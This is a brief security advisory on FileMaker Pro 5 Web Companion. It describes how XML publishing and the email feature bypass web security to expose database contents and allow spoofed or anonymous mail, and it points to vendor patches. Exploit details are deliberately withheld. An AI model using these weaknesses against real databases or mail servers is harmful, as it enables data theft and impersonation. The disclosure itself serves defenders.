COMMAND

    FileMaker

SYSTEMS AFFECTED

	FileMaker Pro 5

PROBLEM

    'deepquest'  posted  following.   The  precise  details  of how to
    exploit  these  holes  is  minimized  to  prevent compromising the
    integrity  of  all  current  Internet-accessible  FileMaker  Pro 5
    databases  and  mail  servers.   However,  details  can  be easily
    deduced  by  referencing  the  FileMaker  Pro  5 documentation and
    by  consulting  the  FileMaker   XML  Technology  Overview   white
    paper available via the FileMaker XML Central Web site.

    1. Anyone on the Internet can  view all data in a FileMaker  Pro 5
       Web  accessible  database  regardless  of Web Database Security
       preferences set to deny such  access.  With FileMaker Pro  5 it
       is possible to return data  in XML format based upon  a request
       submitted  by  anyone  on  the  Internet.   The  XML publishing
       capabilities of  the FileMaker  Pro 5  Web Companion  cannot be
       disabled separately from the Web Companion.  The XML publishing
       capabilities bypass certain crucial aspects of FileMaker Pro  5
       Web security allowing anyone on the Web to view any data within
       a FileMaker  Pro 5  database.   The hole  allows anyone to view
       sensitive  data  contained  within  FileMaker  Pro  5 databases
       such as credit card  numbers, passwords, employee records,  and
       trade secrets that are not intended for public access.

    2. Anyone  on  the  Internet  can  use  the Web Companion's  email
       capabilities to  retrieve all  data contained  in any FileMaker
       Pro 5 Web Companion enabled database regardless of Web Database
       Security preferences set to deny such access.  FileMaker Pro  5
       Web Companion  new email  capabilities include  the ability  to
       specify that any field in a database be used as the format  for
       the body of  the email message.  This new functionality  can be
       accessed through a request submitted by anyone on the Internet.
       The  new  email  capabilities  can  be  used  to bypass certain
       crucial aspects of FileMaker Pro 5 Web security allowing anyone
       on the Web to send the contents of any database field via email
       to themselves or a third party.  The hole makes it possible  to
       access  and  rapidly  distribute  across the Internet sensitive
       information stored  in FileMaker  Pro 5  databases not intended
       for viewing by the general public.

    3. Anyone  on  the  Internet   can  use  Web  Companion's    email
       capabilities to  send anonymous  or impersonated  email thereby
       compromising the integrity  of any targeted  mail server.   The
       hole  allows  anyone  to  anonymously  flood email accounts and
       mask  or  impersonate  the  true  identity  and  source  of the
       originating  message  making  it  virtually impossible to trace
       the origin of malicious activity.   For example, anyone on  the
       Web could  access any  organization's FileMaker  Pro 5  powered
       Web  site  and  submit  a  query  that  contains commands which
       instruct the Web Companion to send an email from the  president
       of the organization instructing all employees not to show up to
       work.  As the email would originate from the organization's own
       servers, it  would be  virtually impossible  to trace  the true
       location of the perpetrator.  (.../...)

SOLUTION

    Solutions exist; look at:

        http://www.blueworld.com/blueworld/news/05.01.00-FM5_Security.html

    Details and patch for Mac & Windows:

        http://www.filemaker.com/support/webcompanion.html